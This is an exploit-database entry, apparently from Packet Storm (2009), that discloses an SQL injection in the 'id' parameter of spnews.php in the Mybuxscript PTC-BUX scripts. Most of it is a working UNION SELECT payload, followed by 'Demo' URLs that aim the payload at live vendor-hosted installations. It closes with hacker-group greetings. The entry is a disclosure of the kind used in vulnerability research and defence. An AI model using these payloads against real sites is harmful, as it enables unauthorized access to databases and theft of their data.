Mybuxscript PTC-BUX SQL Injection

2009-09-01T00:00:00
ID PACKETSTORM:80847
Type packetstorm
Reporter HxH
Modified 2009-09-01T00:00:00

Description

                                        
                                            `------------------------------------------------------------  
  
Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability  
  
------------------------------------------------------------  
  
Author.: HxH  
  
Contact: HxH[at]live[dot]at  
  
---------------------------  
  
Script.: Mybuxscript PTC-BUX (BASIC/ADVANCE/PRO)  
  
Home...: http://www.mybuxscript.com/index.php?cPath=1  
  
-----------------------------------------------------  
  
Exploit:  
  
[~] http://localhost/Path/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--  
  
------------------------------------------------------------------------  
  
Demo...:   
  
A: http://mybuxscript.com/salescripts/ptc_basic/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--  
  
B: http://mybuxscript.com/salescripts/ptc_advance/?p=spnews&id=-10+UNION+SELECT+1,version(),3,4--  
  
C: http://mybuxscript.com/salescripts/ptc_professional/?p=spnews&id=-12+UNION+SELECT+1,version(),3,4--  
  
------------------------------------------------------------------------------------------------------  
  
Greetz.: ~ JiKo ~ The Sad Hacker ~ All No-Exploit.com Members  
  
-------------------------------------------------------------  
  
  
`